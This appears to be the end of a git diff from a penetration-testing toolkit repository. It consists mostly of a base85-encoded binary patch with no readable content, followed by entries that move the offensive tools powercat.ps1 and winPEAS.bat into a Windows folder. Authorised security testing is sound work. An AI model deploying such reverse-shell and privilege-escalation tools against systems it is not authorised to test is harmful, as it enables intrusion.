zoez)@X6K~&m}<1DvgHP81TACaQef&>Ru3gAr+J^xJjC@ShgG9xXJ!LAAG2970vt>J zdNj%7aoog@5X6u8^2MlSPEZ+Sn#Wkfi_-BX_|gDl%f(bZl$AB5gKRwmJ$C1}j@jL3 z30@6S%dABL^u)eZlki7=`LMg30BRWxt=jJb)oc-Tth#ibrZ|ll&QwT}#zqt$F#RH_ 
z)kSdC5HgO{g9SRBgnsBuNCD^9LqH>^0E<-cH4%0OaquIo0P_lLtD*;3miD<3q7b0_* ze%EkuqfNhCpHq_&5j;TUT=LjZp%ig?AV0^ZM|JJ;gum?CjY@6RM>?-;ZXh4_A&x|w zG?>ux1sqs3H#n{p+i2)cvYcn=5@FVuIDJh}0`&IZ4t4I#!_YmC^`wT>2)-GNFGYB? zsFLk^jotZr(9$Ld7$o+>tL&S^T@| z5*^yWQC!z(v^!1LY2IS27&k5BhS-;dzPD+2R#VY9ja@6i{5n^_IE^hB3V)vs^#(M_ zXAEWvCQ3{~KWMn>D%Lm-uAhb0Vxk!~p0EsDPfJ`(1jBxUdB(sM=9r!g^DJQqT+uzI z6T>VaOjicp1+ej1M3OPRSl&TJw=uAaiWDju!Saj`f#5TYVHls`3}k%f5b-FMUr&4( zxPAliDX0AHtmvd0goNW5<_W?O2+m^|#zvU2473Am^dZhMEWeD3#xrm^6@5)=n85Ok z4}stl%P@?Ok%5fQZX%9nd4>2eaQ!{Rr~K(02?O}r%5cIO+}L#m_tQFs3?`?86N_{Cz)XwpA-f%K0ZV|h2@!?3|wDA ze5MfJB3AUA8-#?@7^aLc1cGx0!_d|%CX<1a05)!={PdQhg$zumA}1C7I)E&2o*M+8 zVnz{17&`-d67hV>|C153A_m?&gs{IeEL}us9D^?$Xc*@M9>L*wg8OrLBEiHCG?NJK zz~N+qWe%qi{404Rr<_jkWe!gx_zMotB={o^&ms5_hqDNNo5MK-zs6w;!GGg$0l^P* zcp6@KFvwL2w<1pCb584sRv+1rBc`7||f< z_GN;x2O#)0f@v`Yyd7}UQUJRNCJ22!H?r+5pf3;2x4aJ&Sb*f$qm=+MV*TyWo)F!>itr zAh0?YA&30a23iNqPV;=TYS)_)nqd(@Wdv3LMiXEFU?3m@0Af_cIf=^m>;U8w*R}D) zN{+;4jx8snkkPXYR@O4jh!*g5+ZaYDQU9OyB#T<9spF+)udWONRfLV(y>3*{cw{W7MfdkHy_U+m(Zg{^b>L?qib{|mx-=rP>(XvHEd-8pli5N z#P_mvzCmX?Z_fSpcEqw6Ex3Bq;_VDh%L3dH zum~CPcwLnr0x^Pvb|@c3v7;HN1Zw z8qS9>MCP$a-a2@MNH`{^noS9-mW4`s1TG>!Qk{$Ov4=F>rrqI>cr+B3vS>8$ppiYM zSN7qNymGp!y&2br98H?)vnx(vNZm%@e!@*pjM2eNgz9c(^O1+KQ+!?L8a$RAL56vu z`C%SZ*^Q*%g{Pn1kNS8o_(N$}4HVgsub4vLqHdt6Zv0D`e@Oh-2w*#W(f7F%1lM(bP? 
zqiJW>z*LzkghfkCmBwAQOlNhjvHP?j%sgQu1FsfJF$da9S!qi|$Fdt}^9uovH8qS3s zoDrpQP-vae5 zrqvaO-oVh1<2*Q?2lL)!d)S6)cgBWlch)kZN4@J_&mU|0*49qb?SjAa@eP_{hG%5?#KMW`-m`St%Q9_ADpj zg4tVT9W+u?gzM9hRDK1I?QtcHo(*a2ZF%N^(i!MO1)e0Ua#x16cT{C9Ab9m7!;r{6$l$_Azok_3=OxHI zL?>4PkReey&K=)w8V)Q35aoU*FIM}1HnU~3H#HDW&u4KKP=+qlOFrNy*Lz@6uB|6f zF9C%})(@7bcRSR*uB(s&1Ayy22r_%F1r3xM!P+{<^p&r~`Md>bV2CtKZ5gq)Y8x<& z(u7APmuLlPglN=sJhg*|e{w(88{@7J!ZVJ^jH9v-mU9Ovk6~+ofKg(bZu@NQPCE^g zAL^^Ieyl~|9bF;LA(hv@&Ijd9=aI48^pYqTmm%Kb3dU$ z_AIE*_3BU(r{@$Dl1(z%x2&Pwk@{3Q1O?zlCh;bB zNzw*Qx&~luuso2^zm%{N+?`qk;303N2C#ONeN7!PZJ`=EYCw%TrjgyG5N7PI5VU|` zD*$)*!J{b)G|5#YB1K`iOULLHUsWz;O?Upqz@<1~RdJ@7rc@6@FN2F0LCTBx)b2WZZ< z#=wxh!45_adHaK;1J5xPE*4{g{>tB1@Jjt*7fmpOp640jj4O?};FgWBLZ|MB3{KgP zvG2J{&_#IY0;zqc?wFu!9)c|PNkyc)SReOt+>SL4pLr49_#y~Og#>%AFy(9oJ=-I1 z1v{Y}+*Jn_c1+ID^&+(B>QCI69p8@nt{g}~hokR+0z3zToEed>194{>oqN)(%)y3J zNea^&87D;GdO;`Coi#Y%eO}f)0qua-xrIc-hQ)hM{Ir@^Xk70t=eHns%jrXMt{Tj1 zJA*gdA?I$0O>%bSaynXg-!SAW1amKGw$q4{iJ>O%oBTbaV!dPII+NF$d!+iTb}c(s z!nmVV9>XwRWFP)~U?^^bo6(yQhqf4D;~k#f-XKw=kVqKe4^z>Z5c-W0;yYAvd(&QA zB$`U>agOUL>c1*K0vc~C@Mm;n1t?tR#o)75++UDwW|D*ucrJKg+N@dCW846a0wT&-iLbd zxCjoaq1;%B6W>z7pCzMR+_b#m?7|s*Z3;AV5kK4dZ`Zg=HTGYIyEYwZilwCl{n3g3 zkgFxkjU)fdN~R^UYc}#(Ebn%T1>)Hjoy$aEyUe%bx?a#4ZNVRMKOm!S^ZJ`veOmK1 zwytP>^K#-3k4pb7vb{Q=<4Qk!|lZ=94xd8qQ;Z|&fP^>Z2eMf$@P;Wd!K~-M6fYigHrouER z?HqouMIjA-N&{WPxxN7cW|i#^_>RL~7g=1hZEAPGcRcRL@Em?`r8(fMH>=A+5k_Gp zLLcu!5$5XH1JbR?74zJ<1CqXR0vNv&0_EZkZwiuV`;lc+RMUQkE5z4yL^17GGmj_@ znp#bRvkaGwbx~9o+hS)A9~Lz!2L{@YG=)-wqTQCn@vR2Gr~6X1AL(z$k|e*GN}bSs zn~%gf$p^P0#jfGx037t$4??sPtZW8alIsB`Ip@bT6>E32sdf3qYj?Qfm2bc&W+X;( zho8?{UuqMj+8wn<6!P*6IKp(g!eAA3^mLRQSG6PPQcn7zT=wh%MZx@XbVBfJ`#hF|FofJzT}^(qHz5b4laNqf zi1HyWmYxZ4?A0hCcu={+haOk%C(#ZPBitr~`Qvw#d2G?F+DYA9e>!T={FtLBpM>VY;Rk-#}Nm?2{0+sq*y_l1fMMubN!zsM9Ei z%xco%0HRcq8Uh@+{SLB^sa(Q!@3E%ZO0x9>ga~nb1L2!)5k#*uBBJ0AXk9aJ1Cd;x z%lu{sRel=~8$BDsZ@Std4`e_+li01>1x$a9zxc5Z9thAQ;@mIU+H& 
z;;skUM1Z}^2p0HRu37mUCHP}IKV=8)zsHGYYF32J`kVWQ)lj7~Ub|LslC1k;~D6Z=|L~6XM zYt1d(96#f-ve~mcjC7=XhEsVos0WtywHMb8l&4)^je7N_J@}TI@Y88|Ioelovro-v z2%sjS_X@+b(5R@oc~qXf$J;P*4Uie;9x}}FRL%`^4>Qb2LbMnrBkIbC#+vq2I_phG zSlfDK?!hEA@;eq*$>wZ6e}a@x=y$+=|8#rBj&KSz#kEy$pqgvLt-SYtAcMvap~o~> zzd`{Rho9ziE)iJlUS>sST>hjRwv+IoI!@i=iM-BdUx; zO0)wx*Ppmb?i5^g#C3a?o9h~))NEL_>_~uKk}7cl6OymQSy)&$|hRTnkoX>z{rsji^EeCE7=fFwIH+?;b)ntau{M_`GX4I>^{E`jF_`amMo0rnon^wLeA1P;7i(<$n@NYBf4_LCPGMhPy}#b4-N&u89c_L3e-Ic2~IHq9kP;+ zxW4P<`v>uNzVK5kM5FitJ^S$*dp;XlBf%BB3K(xX9l@UhBnh3)kl6VE=cvVV4;0J8 z8FSn}pO47y50f}k41zrF!w}b3Bp04Pa7sLTCL3M^qvc@Ei+3Ev`= zegjNho4%m^#}Ht#C&3e*Fvvo2oUN0p>q^)w;wh!vmerS8eOn*=R$?|v>sZX&$roaD zfda)Z=H{S5Pj6IdH%ZOr7YWQB9NK&j_})MgEJ(Wk6$wY`}Ps=iq5lBl&R=6-zAv=HI4)qbbb3Q>X)2Js9S-8 z|A_Js_5;L%DHQs1`YVVmaNqbEdV|^(tahF2^Ii~%sb0C_INu}s3J&{67zd!*2Ov~_ zfGFKblrPTVVaFbzRJj~g9oGVu)9O5o%HBg6SgOPl!`z`J4ZU;y0O28@9axC=5KAaT z`h6zJUFZ54Mqs9k*X)Nth$!Vrpiy<5h>iG(xwBIUhIFf0!I>!4gBBF|M*xjcyc=&J z2z1W|*WLiuwMRt*zUUh6*P$0O@l@sZ_%5uaI2q^Y3`0EW1m_&490bT_HEEk%6o(#M z{v3Tih$6^;3PpSjjsR+Won!ZUu)7HR7-!QBFnWGJ64cz{p?Q#K7IB)ZGcc!^6+jh* za3DB7IfeD)6t*rIoa950@Kdp0CP11jl4cBVH^sv~O%^ouuQ3Sk*e$eQXTq z5;6YRu?aMOzVRnC49WU>xP%gy&pGxw>hhlc1gP;K$A0d?o+Rw+9DCSGk98zoaCxS523ePLCO)Ya0KIr_?H;z zX5t$$`f$iU6`+_GfSUS%_clb)ZhOEmHX6b9HZ;KfBh-MG?Z_8^g#dIuJmr1zJdW$Q z9xxqyI57PY($N~+y9Odju9v%^IovDg4w>izjH^47iGElpe?lDrX-`f%7Nj^hc^Ozt zJ~^JHOwo@Eo>Ne18DQfs`VH!C4NXii??!FNp(s%0Tku_7yMpwT4v_09g}RYND^ecG z^bk4(Jq=?O==s16KL8|&`lBPap%~VHXFz|VK%14k8!pT~7kl30K3Aja^wV{5%w~2! 
z*v4gMIT4)L6pSU7svLtj)U9o__&Tucw6_a-hvgQ_D$c(C)H)hS#`D z?hvsPs9lH8P^7&d?>Q>M18C)Y*VRz)cLu+BI|?8F1TC{NK5Ad2h zP;&x0zXc3MruFV@0@0X1qFt%)?y(CC8J#Qvbb4)`?0 z?)wc@tYH=3U=_9N?nckwq3**PC!!YggqC65EeF%TTYPYS^qIFjcRB8U0nelk4 z$W44UHOEYR{2}Jzx^Ypo)m6NaTR5$K5n?jXLaa?VAXW}EEnx2}g7CwEhPLcI0iT)* z7`yXIEX}e5VSRH0yG?A1Mt(C2|J(AO9|w6KIz@K0vk%GWwH3I)7_0IVtNLAF+y=h~DvI z3g#E4^T)*(^jyw1@DV3EvBd@S2LZV+Ibs$Rf*!P7YW zEWwjF97}#8eB|IW5Ke2oP^;@Z$0ULn$NvC2@sb=p~!=Zo@p zM4BSfc_K}4(}{GjNZoWLZaR_n66rCK?hxrnk=`ciyX)P?@YDnPG>7lNxRAWJiS$8{ zR*00&xT*YDt8}C&_ZR8lR`l&f{;H_gOXNQn`E?>4FYuoB1^x+Lk%q z;(e|)tP-9Uo8hMsExPPLFy25k5+a_+**!VKY&@|#)2v&QOPGC-+<=1FGz9U$V0>H? zi5;9^S5gE9!Rv$a0(v+dOYd1Qo0X+uX=bG;Y(|oj7dGD!?O#!X5qKPv)vZtU&VVE} zTW?kiu?1fo;`$KB4meo57bJ9(oZSw`sZCxOq$r}^EXB(+kAVoIpi(<3wWCryDz&4c z9Y|Fm6A z4z3DP209qw+QW#<^AUsKoieV+QQ+D_rTm4K$`$5QsR7SqkxoHMoL_iq>2hEuaKm2YVi}%eeA`V#$5(5 zXx3HC2S>V;x)E8tc@Dn`_OpkwUta!ZhJW8n)8}FL`|BLnVr~COa^{82;g9lhR2()M z&nRG;YUHh8m8^Wx{1LJ7a6lEK_JQ}n7RdpZ75q$9c(qpIa`hnjQcbsjXHa zBG@1>j~NIWdZ($QEmPizwoHN|{HkFOx*-AC3>o6pxB#`I5l=hKn(rOg@Q%!Ooo%_5 zeQ`3Pt@@q%>kNKs4B`Rpjt0+f23_AFl5kwpYpb3E1%}mrCb9qV#QxtW`3BN_(7PYz ze8XOo#srE!SGl2aCB{tni+JtM4#r>hN-N1y8f=EdRfkC^#^;Aryk0hm#f9vuwpsbc z^(mTcdb4G`8Q~R3oa*$`&`i|ZPE;;|*!B%ZzTBYF^Hgai^LOzoYYy*>q~_|9126ok zDL?8iYTb!ijpQ2fc({Y{>Rwi3JqZY0t6EJPMSq|U+a9PwTOACl{0)uQ&{rsLP&91y zT|Bw)@~s5YMF_pB;V;%4$zQBF`z^9C_lq^}X-i{yO+$fb6}=k~?x^~Nw%VVKG2Y|1 zPrOs}K2)kGW$&}(Bf{Qk$!`NQ7Y0)I`!nwbZDn~37S@%v<@~*wpSs_h+10y2dLD!3 zm?~`>`1>V5&|CLDN*Ufbrn1;D#*QGvgNlMB)K8`R4dzGi`FbR%3-zyiC#CtU^5 zl;dD?<1s2i=Ooui6cJ_*VQ9QvVFL3aF!`5_UstDS4BkuvqdU<|IIAu0$O7 z;FnCQ{AwcU>Z*Mp`IZRsEpRYY0lp=cdK~E$Q&c$93gSj7PrkCS}?}3jnDnIjg9-EbOX5}+u|DU4HzNW`Jkb!NA zJYbRn)wFh)eVTa1;-_@+O$$(5@%?dF@?L;4F+iE_hx-XA|EJ#8ht98mrN$xG0s3`{ zmdVgK0D5Qh2Y#3Bn&Tl&v+f5(Eu0__1Z2;&UY`92y4Vs=6_|GoefnJF!vjfvw!-(E zrX%>z0R?$W_fN2G5$0d;5WeRaqWzbVf!Uc9W@y&Y&1%vzzzYb0l=nnhuUu}{g;0D2 zI=ym0X>Qi_C)#0o$X+!w1EiDH#HdS&QNJff{gl{ef0A-OG5S;UFAcVycysV`*vTNW 
zdId>i8G71c-{xIM=IT%6pM*!)Gfecd>1azi?SH0W&BhqNHc^sjx|cQU_Ch{9Ufhf^ z#ItP|UI0ys4+%uJx;9a%(^fr8^Ug_^>N8zfIq|M$=w&pJkb{19=cGGqh&Hf3%>-Y9 z^{$V}5>+`CY*9fO@h(d0WnGda1^P*~^|BTa*%!Lf2_Q(1cBGuC7T^gE9&FZ)Bk7#M ztAJ?MO-H6#r{MT)H!;E9wOKb1IM)wtu;<%gR!sq5ca&ssGB5{VV}&pWvIoor*+k6w z2~SUUwO}|Q=*>XvEj7Au%EIQza)I#E(XVm5bbGd%NbnGnvB`Rl8GVB zx^*bVTCow{)@!`eS#+((b8!$t9Iboha_=vk!TnLvtUH&%xW^Me3|%)hB>EG3+os8C zhv-jmtr%N0)eQ9w2&j(H*wbRMBLDfKx*7KBEvLVppo3!P}yVM}Y5T}^Pn+)tC`Zg8Dt2Qd~@z?zLWXF7xF_nP%` zD!%E{tP3XQM?`;Ac?=5BfzI{vAV6exE$lGAoWapRV;)kiv&_HJzb6o#JWH6XId{r9 zv*!4!XnGC5{Sp-}4#jKtH`Su20hmiS=$Gu>oNGjlx~N(NUsL??W$a|a9(|Mv7ojIP z<29jChnm{D_3fyQh*x9VnUuQ3=;M`v@xHMENzr?)LAdh~AAQ_YZV$l2IbAzjaXc_Q}e7Mcp_`OY^O}1>zaDgnE{7-I7wyN z#L}b>vS%1?AStM^7m&gr1%u}B1krwHkq&m}(HQmTy2wuxd3Sj)fgdT-bt1hg(o;Cj zr21|>_>20TMOq^0Dn#n$=dO2A)W0rLx18?wmy3EkM0!A^R|UPB?>vEjS>WC6y7{zk zRd1Tej~8iYQ7>Pl(?t4t8t-3)$fpSU5|Q`dS>8RK&EX?Oz1u{3ES2+FBhrLcX@$r? zDAMOd`ngD-Xq8?};rw<8yqn(+fgjB99(gda>GM~4^0&9U3y~6SL}tq5l+@`d{Uuv& znPkr^10Jgb^UeBlONmV%o;OHu&8^4-;8mAEL)6e=!$*u9H99&wCpXWMuh-v5upvA4 z282g2fu;88;~}cy^!n{Qy=LdByPS?jy+7_q+l@OaqEmPNKk1DcC@!zawT?Cn&MPXC z7(B`gwlOrTkX3H6WfhiGWEU0YWtC;)-}kcEEY_@o?2^19i?xMkT55XYjHH=aaj8?M zn&L8~$Ve%?e2l)d%vM-hqMsjL-cOHzA}qT&r*MJ2)LtIsuIWt_8A)V$rIzxNel~q} zQBi57KD$JpZCzk5hV`*J-t^(Q|0X@STP=6m3#}H2awB8nYcH`{a!VJK6fUvkc_e2- z1+mWDw44b6(TG7|QITaqc9FYoWTZYkmsb@UY*hj!c=hLIqUi+>DIvSC2vXTf^|@9{ zw#}k1FR&C9>C0_-rFNUXtgy^7NN=%PORf4CeR#R_FX-_Pvi*s?g}Y^uCD-m|5BXY3 zM7vWh*?H-_ZA*DM4X&*K62UQeH!n@kF0>_-T9fTXw!*R^OKQ#?mRwsory0W}qm!>OCK6f-ye9lhaGaxHwa~ zCod%!Gm|n}vWY3vj7croFtSIhCEs3d$&->&Q+e-M15%1H*#sU* zsVNglGIMIWH+Rambc;kWC8uSGaU)&FB_$>cNhN4%s;3ti#VMJoUgm-!^|p_xrerYl zbTXcG+LKM6nU1zRHX=QSRMo)Y8l7%Iul_mP}(%gj>8=sF7O~@cgUuG|{^^wZU?AAiK zXuYkl*kZ-M-w1ziwU?p9TueSW7mL3>pSdHoT|fmsM`0 zCBZ%I{Izg5ZO2outki0Y%voGwFZSqb5NVY3l_%lEws<>z58U@DMK-6LkT*sP18DCjd6D;2umQrnuH!x8$* zLR*18rx1_oJ#v?q+O4_xCq1#;P<4Arb_IqaJEzE^XKMgf_u}l_g2ECkM1>1VO0A%h zGULpSCr}G zFSO#j(preMlH26%eP}khO|rBM3b5(XO|uqlKf 
zqfE-qvy53VX5yHF!ZAfjC8cA^##qb8*mCU^m1CAjxy*?$rFu2uW)FS0jJkwe9tN(k zB%2lq$`ajd*a5{mQQ2FlW=1Fhg_-DQet~JfSo9`%i zI`=d;TL6y``B#vRd8@fO1%Gay&j`2%=?D1xQRJggcOw2O@%Ie=YVh{~{@nFOp&zp= zq6S9|)u&|W3v9NsF++w>*k1zES)4;od~m6C!4UZS+#xX1+-%#Bxj`*DgbymVR2EpQ zmN9`C&e@TC7XVe0Q)V;Ut^3&opa4@@ALRB2aMOh)Ii>cJJXSxlh};Gn)!80Sv)!!b z>KTu@L81r`Yv~ghnHLzCXR*O0@re%c%1evjoN}^r7cRgQD#>I2D6t3=10yZ$A21FK z6is{nIb)ayg{J!1dD$fk*xc*WXD;|J&@Vt7UYWf(kh{i6w`=rFAsE*nJ=QF67#$QC zIZ+R%AK02&Otvxl;e+&}2kE1R4kBfMydW^pM*pmGuGOAzL%tAO@Z56hR8jU~CnO~T@*uB4zeT zuPefZ+@jKQ3#dy11JM_YwJ+rF=}$E?W%P_=0JU#fma(V4xLS%+g})#l%vDEMzJ!g~Me=11ba!SlZki z#0uq(Al!Cf3k=LIDX+9x^%$$C_+CQi>uyNS%`HJV@zHWb3-pm=YqCUj2SsM+NaTA zxs{F`DB>viqasK|?m9b<24YEI;1XC_Wa5xi)*@>Jgs8~|70cjUbj?d$FcEBK(K^=a z!ivH?J2-+G`deVZ@=zR!MYFIZx5!>zSYe^M^f8J}HMZNu+1L_d`9YnCc*NL=H~{h# zm!mym#seVp7E*1HaH~Z*%iY_}hcO zBl!Cif0yw0B>s}2m&(Y>k;Ca9IcIAZMFDoWJnm5R`e}t$8-`+v-C|uVLIgI72wZX& zBZkmth6!1M9ZZ+|nYlFt+m!&l~LC<^HRB zIfV!dX(D;i4=xk`pt!r?|D^v%X&|q*rMoYEAW8J^)W1~Mf;$h~OYce2?_Ri98;}R? z-hC}}VaJiLZ^?T@c?WsUD$z04I;fD(%(cHaESBiEYblYjTPxMk>-nZ ziAe7i=@TM-S)>O=dRnAEiL~8e-cApZ4iagCNT-UlK%`4W`k+W(6zM^cHi+~~kzN(4 z-}}5By-0_Obb?6dh?G-FQh~@@MY=?!t3`URNH>Y}F_CT+>2{I2`Mo3ZM@0ImNL?bm zDpG&C1cgtiNC$~@q)6jMnj+E}BFzzLiAWcTbfrk|5$Pt8ZV~B=BHb?1cSL$Xq{l>h zTBPSi`i)3`66x9f#kq!{)Xpv43=~R*Ch}0_5)gs*> z(uYL)tVmxK>28tk73pD-o)YPKk-9{BRir-f8Q!1&%zv(p|IB}`hyTofu803q=Kn}3 zj`oXY_N-7Ukm9h%v02jatP1B%?wqwW7w5f3+!GfV{$xjz)=2R<4zpR}u=l{ep(vdn z?@RYd@i=$j2R11`o$%My4?pA)2608HY;kt06}821`K3nbZH~zks*{ef{9^1)i!-p5G?ph|Urmto4=Twh%v~6V z6Ahar_47$Afxhs#cFCVKm+F&b$*%YlT1xXt!kKeYVU9K1x)>6!_erx@7Pjd2DId0p zNyCn>)QTgPMIZ@bO0?)^-Z_fGE4Xq=RDJ*Tnl@qj7CXVU1vrils=v<=Hm8 zU~7XW3;WrH(r}+FA$^VyiEsz{m(L(xy8tj7SZTjc7VWP`4wpXl$+DNQ+RyrC;~3H= zz3iK9D}|O`_oajOQuJ_-FPEs!H$NXI9tD#0zHdG|i_e#i0yLnvP0 zSK;oG)K!|EZj39kWS5X_b)y{YyTt|dA`B)_3#K>2aBm|?eKFpkNQh4?2bCnW=pih4 zM<|jM2Z%-^0V#W+gyUgoQz|d8+=8NzsYzeY)Tq7)O{yC`##_N?3KG{8`$DyDu&hF4*CZUSYuxEOR%Pm z&z9BQYJhsvN27^qYY6n02e$Y1=_X5t0{@_a{u)2c>QO!#zb&&2GYrGLFj_;nuSVLU 
zf4bMo9tdOUzf^>hIaPhCW_A{W^{M=H+fc0vA89~y>l50S-Y^7vgw@CpYdVwCH`C9*qt66WR98b6 ze`JC>hDHO)9g72YH(#{ z0f}QU4CdnW^AhJ@)iA8q^!3(JJC^Xl7i#ZH=|<{GYqNm+3qG(VCD$Po1>IHW%Sthv}oP z@BC!(_+3*+H?A7=Wcy)LpF3K1Y|`AEpN=n>w`cRDHi!3o=A8K2(eEv@t2M7qUikUZ zb%TFSb3OCe zsDtmETAZ-$`GH!zRx9t|)ZhHONNsE%o8D;m^P&gJT|wXOKX1LaSBDpSy*2OHuiK?> z%ilig1Dn)5v+8BTs%>oWdulbBW-vhgUXPYsc)fRd+vM%l z^S^)m$kKHQPK_gZ!q~Hq-Tvgz?CBqOdG(Ev`B&cfBffOisMj{7JU=a5`T3qx#T{~T z7SEZm!6)>?$8P;Sz?EmJiCn&NcFHUJ?&-hLv8eZb#^JA2zxPL*hf@a4xnBQAm$$;h zqmr#}zS)1W`H@kj9qT)!OfvOaJ|ya~ZLX=WoLaDX_}Z-Y{qD%0dVE&>O9tG0_-tVF zn5JVPrqxg1)%_`b`Lss|+<(z;ihoh}PlqU*?uSF@W?1d(bAvRZ+PFQ@pvb~|qgPA<4-*ykhVE8}+m{K?Vw>31bOx%!8kjvv=m{{5|0qn4-k zx_?!jf8S4frd1u-{J_Q+?%xr!ZO!7Y8Oz#t_DkBocJrVEPi@W8jX9Aw@W}XfOI*)R zd#%@7A5grOkn(&IIHpL`}QR~(tAhE^V(N>*t_S2e;rWN zY2wclyM4ayo2PRhSoZVQzh^$3_o%hB#;5%D=zF5)?7zPLpB)~1JEUu3ZbMvO_0+bF z58FC@U}*DB>f3+Zv;K)$=ZeQ2ne}kmhMK?c-5j?!>+;cIF?S!S+cNuwoUx0RoT~DY0!1UWU8X~i#JR##QF!a1#inxO)tYR zLzH_4`)E3ci>Y5(S=oB(vm1Ii-mxwo@^85etJ`J#-|-G}uf9JpSQA_IWc8A`vOCVd z_w|eZ(#H!r9tyZG%97e?>kIOyqo25Aiy`Q3XZ^~EZzq@zZ~F1`8KxIj4)yza=A1jq zr09N|l7HTwFx=H6J?iy0GCDUNnXv7nGcyf6{+ZA(eAnH#zUH#84RiE5STX7@O`^&C z?Bxq{Pb_`x=}#kfhs?Sq$Fl8ZsXk=**!Qh(cM5Cw>As47+n>Mw#f<(xwD0`nebGIY z=Pqh{+sswojeR?HShQ^ar^-9EZ*BU*`f}5ov9YP&b?G%@Uc*-9!Iw5h zH12*E-eEAjLucU~G%Q>Qe|7s2O>6J)KQl=YD;T1qh7OG~L=PJ}VkBaPq3{ethl;FW z>W!g7XG16M4T8NUe#*3{frkFvA@udalS9zsY?%8Jqa7zMbQkBpbPPxL#>}nk+pu@p z=%M>`j@}dQ7@MB|*&QR}g9|?>a4M!Jmk;@N!kA%8$4eh>zT@<)kM<>R49fCP`{UiB z{k~7Ho`3rC)WIEXpKm^3>T_4-)o)(Q^Znhn@b#?vqN2D?_k@LvN_=3|3G*#~d%7Yq zt$4vkuAMQZ`P|TNGAunh4J`V--G;6UE8Xux_G)`PU`zgrjoqKQyfV)xas7^}?~Z4#oA<)zS?>k-tlc#2-HlBHBK=2f zd~?*us7w2o4_sJ$aQ!zQ{B3^!!-#mv5Bd2Rq#IpSo0V+A=owB?h!vgdp$7!@LO-Ud#mER`mk459T*+; z!N|Y28@+3TzUtAz>mzEOyn1+3zoRcjXHP%>j|XNwR2R)6ID!jmb_ZCr4msppj*&pmeS{d;F= zzHXG>zoRCg@5h_8Q9r~^*qO9gt3DsRJNLT**3VXaeJ1~WhR^U1Un}rGcKzP3-k;VG z-t+Q>g)1wE{r*_rYioVJSS4BK51BairN^=>T4`ySJ|AhVhU+P&K~kEBmK z)%&^Y^R~{}9}zPmNd7t~_oq#5zRtRMPyF0rZ?4;S`sn7&-aa4yt>>)k-@NkMo-ZC+ 
z-cy7Nt2MFE)VLem!im{GPQGpO|FxwXp2z+TtN-><&%!Twfq@^a(r0930k#MX>|lHY zrZyvJ2?1P`3!K_QZwDkNCZ`sa=p&*TSWuK0SVD>!P>WG-fzAT0HVxdx42sqqe1!#WJ-Z^1B zs!tCzpStr@cIB31Zzd=88?3(S@2|g7rl{?}iqDfevK1wMB!@0Ol-qmNBZsxYS)iht zty8p$ci$c>mpqGze5NN8D;Iw{`shcub(V7c<6c|YGAobZ_-SEUO)cAVzdZ`+J(aCr zT_H48F6Q@}n%{3W=A2);=Epag1wb-eZ|Yu~j8@6`iJ^8+pT1as`}jM?Fkqo_8Ca<7M(Lyg zM=jQ?poP|;7(4(qT1-IA6mWM2X@CRNy8)ItbSd}X2);qtdudxk(}BZ`p3@>aI@Kb-<{sO5@VA8O+Z#!Kr?_%r3*Mi*JX@2S^Vqj{+r+Ne zg!G+>eX#!aU1d(AYNJN6BrdkoRp(6> zr_YA7ou2(<|CALCGvdpqec1MVbxEaz;4y|%U6#AfwX3#${hM>hVP0v*9@2WZY;Jw_y1IS z#Qp~#*Cg64vX= zIng{#)lxx^oq2&7v+9(+HLvR~FFtg%Osv#k($4>7j;4wk7y061`VKQEJZo_Hb0Bt6 zNM7Eg^yQ60?TZ#`-`?)~|H;+kPg$Q`{kZPW*)$2o&vx!7pH6j3)S0W+u!(<#E#JxI z75DQ>dUV{r6}_}c$<_!x;+vHXAmvECUv8iFZR|Z_Q#hmo4ypzXWHRAv*T#kMibI7PM6f8M!qA)&L?wrW+R zu34WjWv>UT@~%Y&MboNsIF|^VUofrg)^?pH@vw_OXWdC&WoW<2%tgSXO3x_v!KI8{ z`}1?=o#vRa{oX8DQ}-r2;je-j2menD7Y`BtF2AYx@0>lyIhfeyMT&dr{P;abzEkYc z^qERp1=3Rv-+JO{tg%-`mWw6hj_cggj`x+9@4er1{p`i9jYlRw&r1}ubn;ZpXDnHh zb?3kE;wxTL8)l@hGS!(?(CVSR=G7_r3)&W*&(m+U|0wc}lwY>;*zwPIKP*|;#55f^ zHa{5=dTfSGOf5j622ct~HlRr#8y?Uf1(fHj!0^t;9LvA>Soe`J-;8DzK$PaF0 zTN;`f8JQZH0&6(*1Yot#Zc7^5`$vDG_Qf3F|F-t7^8GsojnmnxmbQ$*>RE;7y=~J<`u@2+ znlR;H#VWI_r8j2geSFBUDRINGb7vkqY3o(-IXYgwW$U|g_Q$)a`~tBn`A-E$u1U5$ zbIL=zMs`v%V|=_bq!aZC~=kqdoVP2;bKi z_0paFi|@0Ghu%3Xm4ER^=*AOK4bP4?3fm>;<~?1SH7{qOdyLIQ{k>{MlM*D=_uRNI z&(Phr{zVSQ>l~p+D|+`i1UUZNo&Vp?^`u7P-fb#2Dw*lqowXx3{Y{!0Y2K+5u)<3` I0W|Id0Im!h&j0`b literal 0 HcmV?d00001 diff --git a/powercat.ps1 b/win/powercat.ps1 similarity index 100% rename from powercat.ps1 rename to win/powercat.ps1 diff --git a/winPEAS.bat b/win/winPEAS.bat similarity index 100% rename from winPEAS.bat rename to win/winPEAS.bat
